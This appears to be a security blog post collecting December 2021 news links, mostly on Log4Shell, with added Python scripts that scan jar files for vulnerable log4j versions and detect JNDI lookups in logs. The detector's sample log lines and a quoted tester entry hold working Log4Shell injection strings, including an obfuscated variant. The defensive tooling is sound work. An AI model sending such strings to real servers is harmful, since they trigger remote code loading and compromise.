This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
435 Comments
Tomi Engdahl says:
Log4Shell attacks expand to nation-state groups from China, Iran, North Korea, and Turkey https://therecord.media/log4shell-attacks-expand-to-nation-state-groups-from-china-iran-north-korea-and-turkey/
Nation-state groups from China, Iran, North Korea, and Turkey are now abusing the Log4Shell (CVE-2021-44228) vulnerability to gain access to targeted networks, Microsoft said on Tuesday. “This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives,” the company said in an update on its Log4Shell guidance blog post. also:
https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/.
also: https://www.is.fi/digitoday/tietoturva/art-2000008476944.html
Tomi Engdahl says:
Log4Shell: Reconnaissance and post exploitation network detection
https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/#update-wednesday-december-15th-17-30-utc
Update Wednesday December 15th, 17:30 UTC. We have seen 5 instances in our client base of active exploitation of Mobile Iron during the course of yesterday and today.
Tomi Engdahl says:
StealthLoader Malware Leveraging Log4Shell https://research.checkpoint.com/2021/stealthloader-malware-leveraging-log4shell/
While most miners detected are Linux based, Check Point researchers recently discovered a Win32 executable malware identified as StealthLoader. This .NET-based malware surfaced right after the Log4j vulnerability was discovered. The StealthLoader Trojan performs various evasion techniques in order to avoid detection while using the victim’s resources for coin mining.
Tomi Engdahl says:
Joint Statement on Log4Shell
https://www.enisa.europa.eu/news/statement-on-log4shell
Assessment and advice on the Log4j vulnerability.
Review – Public ICS Disclosures – Log4Shell Advisories 12-14-21 https://chemical-facility-security-news.blogspot.com/2021/12/review-public-ics-disclosures-log4shell.html
Tomi Engdahl says:
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works. Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we’ve ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states. also:
https://www.wired.com/story/nso-group-forcedentry-pegasus-spyware-analysis/
Tomi Engdahl says:
Nation State Threat Group Targets Airline with Aclip Backdoor https://securityintelligence.com/posts/nation-state-threat-group-targets-airline-aclip-backdoor/
In March 2021, IBM Security X-Force observed an attack on an Asian airline that we assess was likely compromised by a state-sponsored adversary using a new backdoor that utilizes Slack. Aclip conducts C2 communications via the Slack API. In this instance, the threat actor created an actor-controlled Slack workspace and channels where they could receive system information, including requested files and screenshots; post commands to the backdoor; and receive commands in return.
Tomi Engdahl says:
CISA warns critical infrastructure to stay vigilant for ongoing threats https://www.bleepingcomputer.com/news/security/cisa-warns-critical-infrastructure-to-stay-vigilant-for-ongoing-threats/
The Cybersecurity and Infrastructure Security Agency (CISA) warned critical infrastructure organizations today to strengthen their cybersecurity defenses against potential and ongoing threats. also:
https://www.cisa.gov/publication/preparing-and-mitigating-potential-cyber-threats
Tomi Engdahl says:
The FBI believes the HelloKitty ransomware gang operates out of Ukraine https://therecord.media/the-fbi-believes-the-hellokitty-ransomware-gang-operates-out-of-ukraine/
Law enforcement agencies typically keep information on threat actors private as much as possible in order to gather evidence, watch, and then orchestrate arrests before suspects can destroy evidence or seek shelter in countries without extradition treaties. However, in a recent data breach disclosure, an Oregon healthcare organization appears to have accidentally revealed that the FBI believes that the HelloKitty (FiveHands) ransomware gang operates out of Ukraine. While the HelloKitty ransomware, also known as FiveHands, has been active since January 2021, details about the gang’s possible location had not been previously shared or disclosed.
Tomi Engdahl says:
AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others https://www.bleepingcomputer.com/news/technology/aws-down-again-outage-impacts-twitch-zoom-psn-hulu-others/
Amazon AWS is experiencing an outage that has impacted numerous online services, including Twitch, Zoom, PSN, Xbox Live, Doordash, Quickbooks Online, and Hulu. Update December 15, 11:27 EST: AWS says the issue behind the outage affecting US-WEST-1 and US-WEST-2 regions has been resolved.
Tomi Engdahl says:
If your AWS account gets hacked you’ll have to foot a massive bill, $45,000 in this case, for making someone else some extra cash.
$45,000 AWS Crypto-Mining Hack Generates $800 of Monero
By Francisco Pires published 1 day ago
Lots of work for $800 worth of cryptocurrency.
https://www.tomshardware.com/news/aws-45000-usd-bill-for-crypto-mining-hack?utm_medium=social&utm_source=facebook.com&utm_content=tomsguide&utm_campaign=socialflow
An Amazon Web Services (AWS) customer had a really bad day when they received an unsolicited $45,000 bill for renting computing power from Amazon’s cloud based servers. Further investigation showed that the customer’s account was hacked, allowing the bad actors to spin up AWS servers around the globe while running a cryptocurrency mining software for privacy-focused coin Monero.
The advent of cryptocurrencies brought about the possibility to directly exchange computing power for cryptocurrency tokens. That, in turn, has turned users’ cloud computing accounts into gold. Even if in this case, the amount of cryptocurrency actually earned was comparably pitiful compared to the costs it generated with it: 6 Monero coins worth approximately $800 were minted for a $45,000 cost.
Tomi Engdahl says:
The small box in homes may have become dangerous: “Few know how to configure it”
A home router may also contain the vulnerability revealed last week, and an ordinary user cannot do much about it.
https://www.is.fi/digitoday/tietoturva/art-2000008480187.html
THE log4shell vulnerability that has struck the structures of the internet may be a bigger risk to home users than believed. So far the security hole has been thought to concern mainly web servers, which ordinary consumers do not deal with.
Juho Jauhiainen, information security specialist at the National Cyber Security Centre of the Finnish Transport and Communications Agency Traficom, said in Cyberwatch Finland’s December review of the world of digital and cyber security that the routers common in homes may be at risk.
Routers are generally used to create a wireless wifi network, and many of them also act as broadband modems.
The situation is unclear, because the vulnerable software component called log4j, which records event logs, is very widely used as part of web applications. Contrary to what many have believed, the library is used as part of applications other than those implemented in the Java programming language. It may also be part of the software of many routers.
– You are the administrator of your home router, so this concerns you.
For the ordinary user the situation is unpleasant. Some routers can update themselves, others have to be updated manually – which is an unfamiliar procedure for most people – and some devices are in practice abandoned.
– Few home users know how to configure or update their router, Jauhiainen said.
CLARITY on the matter will only come later, as the effects of the vulnerability are still being mapped worldwide. Some of the effects will probably only become clear after a long time. At the moment, about the only certain thing is that smartphones are not vulnerable.
– This will go on for months or years, and it will never be fixed everywhere. This is a marathon, not a sprint, Jauhiainen described.
Exploiting the vulnerability is easy and does not require great technical skill. A device containing the hole can be given input over a remote connection that the log4j component running on it mistakes for executable program code, and it starts running the attack code.
– I claim that there is no organization that this does not concern in some way, Jauhiainen said.
THE VULNERABILITY has existed for more than eight years, but it was first reported in November. The report was made by a Chinese employee of Alibaba.
The vulnerability was discovered in the game Minecraft. There it was possible to type commands into the chat field intended for conversation, and the server executed them.
Cloud services company Cloudflare observed the first log4shell attacks in early December. The first fix update came on 9 December.
In Finland, not many reports of breaches have yet been made to the National Cyber Security Centre. According to Jauhiainen, this is common in connection with broad security pandemics, because detecting the vulnerability in one’s own system can take weeks.
Tomi Engdahl says:
Log4j software bug could cause ‘incalculable’ damage: What you need to know
Casual computer users have probably never heard of this logging software, but it’s used across the entire internet.
https://www.cnet.com/tech/services-and-software/the-log4j-software-bug-could-put-your-favorite-sites-at-risk-what-you-need-to-know/
Why is this a big deal?
If exploited, the vulnerability could allow an attacker to take control of Java-based web servers and launch remote-code execution attacks, which could give them control of the computer servers. That could open up a host of security-compromising possibilities.
Microsoft said Tuesday that it had found evidence of the flaw being used by tracked groups based in China, Iran, North Korea and Turkey. Those include an Iran-based ransomware group, as well as other groups known for selling access to systems for the purpose of ransomware attacks. Those activities could lead to an increase in ransomware attacks down the road, Microsoft said.
Bitdefender also reported that it detected attacks carrying a ransomware family known as Khonsari against Windows systems.
Most of the activity detected by the CISA has so far been “low level” and focused on activities like cryptomining, CISA Executive Assistant Director Eric Goldstein said on a late Tuesday call with reporters.
Cryptomining attacks, sometimes known as cryptojacking, allow hackers to take over a target computer with malware to mine for bitcoin or other cryptocurrencies. DDoS, or distributed denial of service, attacks involve taking control of a computer to flood a website with fake visits, overwhelming the site and knocking it offline.
Izrael also worries about the potential impact on companies with work-from-home employees.
What’s the fallout going to be?
It’s too soon to tell.
Check Point notes that the news comes just ahead of the height of the holiday season when IT desks are often running on skeleton crews and might not have the resources to respond to a serious cyberattack.
The US government has already warned companies to be on high alert for ransomware and cyberattacks over the holidays, noting that cybercriminals don’t take time off and often see the festive season as a desirable time to strike.
Tomi Engdahl says:
Statement on Apache Log4j Vulnerability
https://www.tp-link.com/fi/support/faq/3255/
TP-Link is aware of the vulnerability in Apache Log4j (CVE-2021-44228: Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints).
Tomi Engdahl says:
Patch Now: Apache Log4j Vulnerability Called Log4Shell Actively Exploited
https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html
Log4Shell, also known as CVE-2021-44228, was first reported privately to Apache on November 24 and was patched on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter.
A vulnerability in Apache Log4j, a widely used logging package for Java has been found. The vulnerability, which can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell. It was first reported privately to Apache on November 24 and was patched with version 2.15.0 of Log4j on December 9. It affects Apache Struts, Apache Solr, Apache Druid, Elasticsearch, Apache Dubbo, and VMware vCenter. Since then, it has been disclosed that in certain non-default conditions, the original patch was incomplete; this was designated as CVE-2021-45046 and a new version of Log4j, 2.16.0, has been released.
This web-based tool can help identify server applications that may be affected by the Log4Shell (CVE-2021-44228, CVE-2021-45046) vulnerability.
https://log4j-tester.trendmicro.com/
It allows you to generate a request that you can run in your environment and test if the server is vulnerable.
There are three options for using this tool:
Use the generated JNDI snapshot and add that entry to any of the form fields on the site or add this to the HTTP Header for User-Agent.
Your unique JNDI snapshot is ${jndi:ldap://log4j-tester.trendmicro.com:1389/957ba47b-e523-4400-85c6-d23f12a66145}
For Internal Server: Generate a quick curl command to test your servers.
For Public Facing Server: Just provide the address of the server and we will try to create a simulated query. Make sure you are hitting some API endpoint/form which eventually does an action in the backend. If the unique ID provided here shows up in the results section below, the server may be vulnerable and should be investigated further. If it does not show up, it does not guarantee that the server is not vulnerable.
Tomi Engdahl says:
Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
This page lists all the security vulnerabilities fixed in released versions of Apache Log4j 2. Each vulnerability is given a security impact rating by the Apache Logging security team
Fixed in Log4j 2.12.2 and Log4j 2.16.0
CVE-2021-45046
CVE-2021-45046: Apache Log4j2 Thread Context Message Pattern and Context Lookup Pattern vulnerable to a denial of service attack.
Fixed in Log4j 2.15.0
CVE-2021-44228
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
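The Apache page above gives the fixed versions (2.16.0, and 2.12.2 on the Java 7 branch) and the JndiLookup class is the component both CVEs hinge on. A practical inventory step is to walk a filesystem, open every jar/war/ear (including jars nested inside wars), read the log4j-core version from the Maven pom.properties and check whether JndiLookup.class is still present. The following is an added example written for this thread, not a tool from Apache or from any article linked here; the jars it scans are constructed in a temporary directory with fabricated contents, and the version thresholds are the ones the Apache page lists.

```python
import io
import os
import re
import tempfile
import zipfile

# Paths inside a real log4j-core jar that the scanner looks for.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")


def parse_version(text):
    """Return (major, minor, patch) from the 'version=' line of pom.properties, or None."""
    for line in text.splitlines():
        if line.startswith("version="):
            m = re.match(r"(\d+)\.(\d+)\.(\d+)", line.split("=", 1)[1].strip())
            return tuple(int(x) for x in m.groups()) if m else None
    return None


def is_fixed(version):
    """Fixed versions per the Apache security page: 2.16.0, or 2.12.2 on the 2.12.x branch."""
    if version is None:
        return False
    if version[:2] == (2, 12):
        return version >= (2, 12, 2)
    return version >= (2, 16, 0)


def inspect_archive(data, name):
    """Inspect an archive held in memory, recursing into nested archives; return findings."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(POM_PROPS).decode()) if POM_PROPS in names else None
        has_jndi = JNDI_LOOKUP in names
        if version is not None or has_jndi:
            findings.append({
                "path": name,
                "version": version,
                "jndi_lookup_present": has_jndi,
                # The class being present on an unfixed version is what needs attention;
                # a jar with the class removed is treated as mitigated even if old.
                "vulnerable": has_jndi and not is_fixed(version),
            })
        for inner in names:
            if inner.endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(inner), f"{name}!{inner}"))
    return findings


def scan_tree(root):
    """Walk a directory tree and inspect every archive found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname.endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fname)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def build_sample_jar(version, with_jndi=True):
    """Construct a minimal fake log4j-core jar (sample data only, not a real build)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()


def demo():
    """Scan a constructed tree; return {archive basename: (version, vulnerable)}."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "log4j-core-2.14.1.jar"), "wb") as f:
            f.write(build_sample_jar("2.14.1"))
        with open(os.path.join(d, "log4j-core-2.16.0.jar"), "wb") as f:
            f.write(build_sample_jar("2.16.0"))
        # A war bundling a 2.15.0 jar, plus a copy with JndiLookup.class removed.
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:
            zf.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", build_sample_jar("2.15.0"))
            zf.writestr("WEB-INF/lib/log4j-core-2.15.0-stripped.jar",
                        build_sample_jar("2.15.0", with_jndi=False))
        with open(os.path.join(d, "app.war"), "wb") as f:
            f.write(war.getvalue())
        return {os.path.basename(x["path"]): (x["version"], x["vulnerable"])
                for x in scan_tree(d)}


if __name__ == "__main__":
    for name, (ver, vuln) in sorted(demo().items()):
        print(f"{name:40} version={ver} vulnerable={vuln}")
```

Run it against a real application directory by calling `scan_tree("/path/to/app")`; anything reported with `vulnerable` set is an upgrade candidate, and a jar without pom.properties but with JndiLookup.class present (shaded or repackaged builds) is also reported so it can be checked by hand.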
Tomi Engdahl says:
Hackers Steal $140 Million From Users of Crypto Gaming Company https://www.vice.com/en/article/4awxep/hackers-steal-dollar140-million-from-users-of-crypto-gaming-company
VulcanForge becomes the third cryptocurrency company to be hit by hackers this month. In total, hackers have stolen more than $400 million.
Tomi Engdahl says:
Billion-dollar natural gas supplier Superior Plus hit with ransomware https://www.zdnet.com/article/billion-dollar-natural-gas-supplier-superior-plus-hit-with-ransomware/
Superior Plus becomes the latest oil & gas company to suffer from a ransomware attack after Colonial Pipeline was hit in May. Superior Plus Press Release:
http://www.superiorplus.com/press-release/?year=2021&workflowId=1e7c0589-f294-4596-ab0d-35c821e098ba
Tomi Engdahl says:
Hackers Spread ‘Antiwork’ Message Via Insecure Business Receipt Printers
December 7, 2021,
https://god.dailydot.com/antiwork-message-receipt-printers/
Workers across the U.S. have begun to find that their store receipt printers are randomly printing off pro-labor and pro-union messages as “hackers” use a wireless printing trick to spread these sentiments to those who need it most—the underpaid, undervalued, and overworked. The receipts.
“ARE YOU BEING UNDERPAID?” asks one such receipt posted to Twitter. “You have a legal, protected right to discuss your pay with your coworkers. This should be done on a regular basis to make sure everyone is being paid fairly. It is ILLEGAL for your employer to punish you for doing this.”
Tomi Engdahl says:
Merry Hackmas: multiple vulnerabilities in MSI’s products
https://voidsec.com/multiple-vulnerabilities-in-msi-products/
This blog post serves as an advisory for a couple of MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they are shipped with.
Tomi Engdahl says:
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the “BlastDoor” sandbox), passing any image file received with the extension .gif:
[IMGIFUtils copyGifFromPath:toDestinationPath:error]
Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn’t mean it’s really a GIF file.
Tomi Engdahl says:
Researchers Uncover New Coexistence Attacks On Wi-Fi and Bluetooth Chips https://thehackernews.com/2021/12/researchers-uncover-new-coexistence.html
Cybersecurity researchers have demonstrated a new attack technique that makes it possible to leverage a device’s Bluetooth component to directly extract network passwords and manipulate traffic on a Wi-Fi chip. The novel attacks work against the so-called “combo chips,” which are specialized chips that are equipped to handle different types of radio wave-based wireless communications, such as Wi-Fi, Bluetooth, and LTE.
Tomi Engdahl says:
Second Log4j Vulnerability (CVE-2021-45046) Discovered New Patch Released
https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html
The incomplete patch for CVE-2021-44228 could be abused to “craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack,” the ASF said in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but removes support for message lookups and disables JNDI by default, the component that’s at the heart of the vulnerability. Users requiring Java 7 are recommended to upgrade to Log4j release 2.12.2 when it becomes available.
Tomi Engdahl says:
Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html
Researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can “allow for exfiltration of sensitive data in certain circumstances.” Additional technical details of the flaw have been withheld to prevent further exploitation, but it’s not immediately clear if this has been already addressed in version 2.16.0. The latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of Hafnium and Phosphorus, have jumped into the fray to operationalize the vulnerability and discover and continue exploiting as many susceptible systems as possible for follow-on attacks. Over 1.8 million attempts to exploit the Log4j vulnerability have been recorded so far.
Tomi Engdahl says:
Log4j attackers switch to injecting Monero miners via RMI
https://www.bleepingcomputer.com/news/security/log4j-attackers-switch-to-injecting-monero-miners-via-rmi/
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success. This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
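The NCC Group detection write-up linked earlier in this thread and the LDAP-to-RMI switch described above both come down to the same defender task: spotting JNDI lookup strings in whatever your application logged (request paths, User-Agent, form fields). The following is an added example written for this thread, not code from BleepingComputer, NCC Group or any other source linked here. It normalises the single-character `${lower:x}` / `${upper:x}` / `${...:-x}` lookups that published detection rules account for, then matches on the protocol after `${jndi:` so that LDAP and RMI callbacks are reported separately. The log lines are constructed for the example and use the reserved `.invalid` domain.

```python
import re

# Constructed sample log lines (not from any real system): a benign request,
# an LDAP lookup, an RMI lookup, a nested-lookup variant and an unrelated lookup.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid:1389/a}"',
    '10.0.0.7 - - "GET /api HTTP/1.1" 200 "${jndi:rmi://example.invalid:1099/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://example.invalid/c}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${env:HOME}"',
]

# Single-character case lookups and ":-" default-value lookups are expanded by
# log4j before the jndi prefix is checked, so a plain-text matcher has to collapse
# them first or it will miss the nested form.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}])\}")
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}])\}")

# Protocols seen in JNDI callback URLs; ldap and rmi are the two named in the article.
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE
)


def normalise(line):
    """Repeatedly collapse one-character nested lookups until the line stops changing."""
    prev = None
    while prev != line:
        prev = line
        line = CASE_LOOKUP.sub(lambda m: m.group(1), line)
        line = DEFAULT_LOOKUP.sub(lambda m: m.group(1), line)
    return line


def classify(line):
    """Return the lower-cased callback protocol of a JNDI lookup in the line, or None."""
    m = JNDI_PATTERN.search(normalise(line))
    return m.group(1).lower() if m else None


def scan(lines):
    """Return (index, protocol, line) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        proto = classify(line)
        if proto:
            hits.append((i, proto, line))
    return hits


if __name__ == "__main__":
    for idx, proto, line in scan(SAMPLE_LOGS):
        print(f"line {idx}: jndi via {proto}: {line}")
```

Feed it real access or application logs one line at a time; a hit is a reason to look at the host, not proof of compromise, and the absence of hits says nothing about payloads that were logged by a component whose output you are not scanning.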
Tomi Engdahl says:
Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions https://blog.checkpoint.com/2021/12/16/phorpiex-botnet-is-back-with-a-new-twizt-hijacking-hundreds-of-crypto-transactions/
Check Point Research (CPR) spots a botnet variant that has stolen nearly half a million dollars’ worth of cryptocurrency through a technique called “crypto clipping”. The new variant, named Twizt and a descendant of Phorpiex, steals cryptocurrency during transactions by automatically substituting the intended wallet address with the threat actor’s wallet address. CPR warns cryptocurrency traders to beware of who they send funds to, as 969 transactions have been intercepted and counting. Twizt can operate without active C&C servers, enabling it to evade security mechanisms.
Tomi Engdahl says:
New PseudoManuscrypt malware has infected 35,000 systems this year
https://therecord.media/new-pseudomanuscrypt-malware-has-infected-35000-systems-this-year/
A new malware botnet named PseudoManyscrypt has infected roughly 35,000 Windows computers this year, security firm Kaspersky said today.
First spotted in January 2021, the botnet is currently distributed via pirated software installers and application cracks advertised on several internet sites. Kaspersky said it discovered the new malware after it infected systems running industrial control systems monitored by its ICS division. A deep dive into the malware’s code found that PseudoManyscrypt is akin to a malware Frankenstein, being assembled by copying features and code from a variety of other malware strains, ranging from regular commodity malware like Fabookie to some portions being borrowed from malware developed by Chinese (APT41) and North Korean (Lazarus Group) cyber-espionage groups.
Tomi Engdahl says:
Coombe hospital ‘operating normally’ despite cyber attack
https://www.rte.ie/news/dublin/2021/1216/1267129-coombe-hospital/
The IT systems at the Coombe Hospital in Dublin have been locked down as an investigation begins into a cyber attack. In a statement, the Coombe Women and Infants University Hospital confirmed it had been the subject of a cyber attack overnight. It said services are continuing as normal, but its IT systems are locked down on a “precautionary basis”.
Tomi Engdahl says:
NY Man Pleads Guilty in $20 Million SIM Swap Theft https://krebsonsecurity.com/2021/12/ny-man-pleads-guilty-in-20-million-sim-swap-theft/
A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps,” scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.
Tomi Engdahl says:
Cloudflare is experiencing widespread latency and timeouts
https://www.bleepingcomputer.com/news/technology/cloudflare-is-experiencing-widespread-latency-and-timeouts/
Cloudflare is experiencing widespread latency issues with their network and services, causing websites to load slowly and customers to experience performance issues accessing the customer dashboard. The issues started at around 3 PM EST and affect sites worldwide, including BleepingComputer. This problem affects different regions differently, with some areas not having any problems accessing a website, while others find it very slow.
Tomi Engdahl says:
Meta Targets ‘Cyber Mercenaries’ Using Facebook to Spy
https://www.securityweek.com/meta-targets-cyber-mercenaries-using-facebook-spy
Facebook parent Meta announced Thursday the shutdown of some 1,500 accounts tied to “cyber mercenary” companies accused of spying on activists, dissidents and journalists worldwide on behalf of paying clients.
The Facebook and Instagram pages were linked to seven firms, with services allegedly ranging from scooping up public information online to using fake personas to build trust with targets or digital snooping via hack attacks.
Meta unveiled plans to alert about 50,000 people it believes may have been targeted in over 100 nations by firms that include several based or founded in Israel, which is a leading player in the cybersurveillance industry.
“The surveillance-for-hire industry… looks like indiscriminate targeting on behalf of the highest bidder,” Nathaniel Gleicher, head of security policy at Facebook, told a press briefing.
Tomi Engdahl says:
Google Says NSO Pegasus Zero-Click ‘Most Technically Sophisticated Exploit Ever Seen’
https://www.securityweek.com/google-says-nso-pegasus-zero-click-most-technically-sophisticated-exploit-ever-seen
Security researchers at Google’s Project Zero have picked apart one of the most notorious in-the-wild iPhone exploits and found a never-before-seen hacking roadmap that included a PDF file pretending to be a GIF image with a custom-coded virtual CPU built out of boolean pixel operations.
Tomi Engdahl says:
Thousands of Industrial Systems Targeted With New ‘PseudoManuscrypt’ Spyware
https://www.securityweek.com/thousands-industrial-systems-targeted-new-pseudomanuscrypt-spyware
Tens of thousands of devices around the world, including many industrial control systems (ICS) and government computers, have been targeted in what appears to be an espionage campaign that involves a new piece of malware dubbed PseudoManuscrypt, Kaspersky revealed on Thursday.
The attacks targeted 35,000 devices in 195 countries between January and November 2021, including devices housed by high-profile organizations. Roughly seven percent of the targets were ICS, with the engineering and building automation sectors being most impacted. Attacks were also aimed at military industrial enterprises and research laboratories.
Tomi Engdahl says:
Iran-Linked APT Abuses Slack in Attacks on Asian Airline
https://www.securityweek.com/iran-linked-apt-abuses-slack-attacks-asian-airline
The Iran-linked advanced persistent threat (APT) actor MuddyWater was observed deploying a backdoor that abuses Slack on the network of an Asian airline, IBM Security X-Force reports.
Also referred to as MERCURY, Seedworm, Static Kitten, and ITG17, the hacking group is mainly focused on targets in the Middle East and other parts of Asia.
Tomi Engdahl says:
North American Propane Distributor ‘Superior Plus’ Discloses Ransomware Attack
https://www.securityweek.com/north-american-propane-distributor-superior-plus-discloses-ransomware-attack
Tomi Engdahl says:
Threat Groups Reportedly Working on Log4Shell Worm
https://www.securityweek.com/threat-groups-reportedly-working-log4shell-worm
Multiple threat groups are reportedly working on developing a worm that leverages the recently disclosed Log4j vulnerability, but many experts say that — if such a worm is created — it may not be as bad as it sounds.
According to researcher Greg Linares, at least three groups — ones that have been linked to Eastern Europe, Russia and China — are looking into creating a Log4Shell worm, mostly for financially-motivated attacks that involve extortion or selling access to compromised hosts to ransomware groups.
https://twitter.com/Laughing_Mantis/status/1470165580736987137
Tomi Engdahl says:
Microsoft Spots Multiple Nation-State APTs Exploiting Log4j Flaw
https://www.securityweek.com/microsoft-spots-multiple-nation-state-apts-exploiting-log4j-flaw
If defenders needed any more urgency to patch and mitigate the explosive Log4j zero-day, along comes word that APT actors linked to China, Iran, North Korea and Turkey have already pounced and are actively exploiting the CVSS 10.0 vulnerability.
Security response teams at Microsoft on Wednesday confirmed nation-state hackers are poking at CVE-2021-44228 (the identifier for the Log4j vulnerability) to launch high-end malware implants.
Redmond’s Threat Intelligence Center (MSTIC) expressly identified nation-state backed hacking teams from China, Iran, North Korea, and Turkey as the adversaries exploiting the flaw.
“This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives,” Microsoft said in a note on Log4j exploitation.
Tomi Engdahl says:
PinePhone Malware Surprises Users, Raises Questions
https://hackaday.com/2021/12/16/pinephone-malware-surprises-users-raises-questions/
On December 5th, someone by the IRC nickname of [ubuntu] joined the Pine64 Discord’s #pinephone channel through an IRC bridge. In the spirit of December gift-giving traditions, they have presented their fellow PinePhone users with an offering – a “Snake” game. What [ubuntu] supposedly designed had the potential to become a stock, out-of-the-box-installed application with a small but dedicated community of fans, modders and speedrunners.
Shockingly, it was a trojan! Beneath layers of Base64 and Bashfuscator we’d encounter shell code that could be in the “example usage” section of a modern-day thesaurus entry for the word “yeet”.
The malicious part of the code is not sophisticated – apart from obfuscation, the most complex thing about it is that it’s Bash, a language with unreadability baked in. Due to the root privileges given when installing the package, the find-based modern-day equivalent of rm -rf /* has no trouble doing its dirty work of wiping the filesystem clean, running a shred on every file beforehand if available to thwart data recovery. As for the “wipe the cellular modem’s firmware” bonus part, it exploits the CVE-2021-31698. All of that would happen on next Wednesday at 20:00, with scheduling done by a systemd-backed cronjob.
[ubuntu] didn’t share sources, just the binaries, packaged for easy installation on Arch Linux. One of the prominent PinePhone community members installed that binary and enjoyed the “game” part of it, asking about plans to make it open-source – receiving reassurance from [ubuntu] that the sources would be released eventually, “just need to clean it up”. Some weren’t so sure, arguing that people shouldn’t sudo install-this random games without a source code repo link.
Tomi Engdahl says:
New head for the cyber sector
https://etn.fi/index.php/13-news/12973-kyberalalle-uusi-vetaejae
Peter Sund has been appointed executive director of Kyberala ry, the Finnish Information Security Cluster (FISC). He starts in the position right at the beginning of next year. Sund has previously worked broadly in the field of security in domestic, EU, UN and corporate roles. In his research, Sund has focused especially on cyber security governance and management systems and their legal questions.
https://www.uusiteknologia.fi/2021/12/17/kyberala-saa-uuden-vetajan/
Tomi Engdahl says:
Security firm Blumira discovers major new Log4j attack vector
https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/
A basic JavaScript WebSocket connection can trigger a local Log4j remote code attack via a drive-by compromise. Wonderful. Truly wonderful.
It doesn’t rain, but it pours. Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector.
